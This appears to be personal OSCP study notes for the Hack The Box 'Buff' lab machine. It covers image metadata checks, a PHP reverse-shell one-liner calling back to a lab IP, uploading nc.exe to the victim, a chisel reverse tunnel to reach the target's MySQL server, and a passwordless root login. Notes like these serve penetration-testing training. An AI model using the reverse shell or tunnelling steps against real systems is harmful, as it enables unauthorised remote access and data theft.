O
O
OSCP Notes
Search…
HTB buff notes

HTTP tips

  • when you see images, try downloading them and analyze the meta data.
    • wget image_URL`
    • exiftool image.img
    • check the modification time
  • php -r '$sock=fsockopen("10.10.14.8",81);exec("/bin/sh -i <&3 >&3 2>&3");'
Powershell command
get-content -shows what the file does
tasklist - shows all the programs
Upload nc.exe on the victim
nc.exe -zv localhost 8888
(talks to the server)

using chisel to interact with SQL server on Windows target

GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTP
GitHub
  1. 1.
    Download both linux and windows 64 versions gz
  2. 2.
    gunzip them and rename them to whatever you want.
  3. 3.
    Transfer the windows target machine (the windows file)
  4. 4.
    On Kali, gunzip the linux file and chmd +x it. start it with (if an error happens, the port is in use)
./chisel server --reverse --port 9002
  1. 1.
    On windows,
.\chisel.exe client IP:9002 R:3306:localhost:3306
Now that the tunneling is set up, we can connect to the sql serve via local host:3306
On kali,
nc localhost 3306
You do want to have mySQL credentials before connecting.
mysQL password
look into /include for passwords

Login to the SQL server!

mysql -u root -p (no pass) -h 127.0.0.1
-> show databases;
use table_name; #shows columns
(you can make sure you're connected via chisel by "ss -lnpt | grep 3306")
Copy link
Outline
HTTP tips
using chisel to interact with SQL server on Windows target
Login to the SQL server!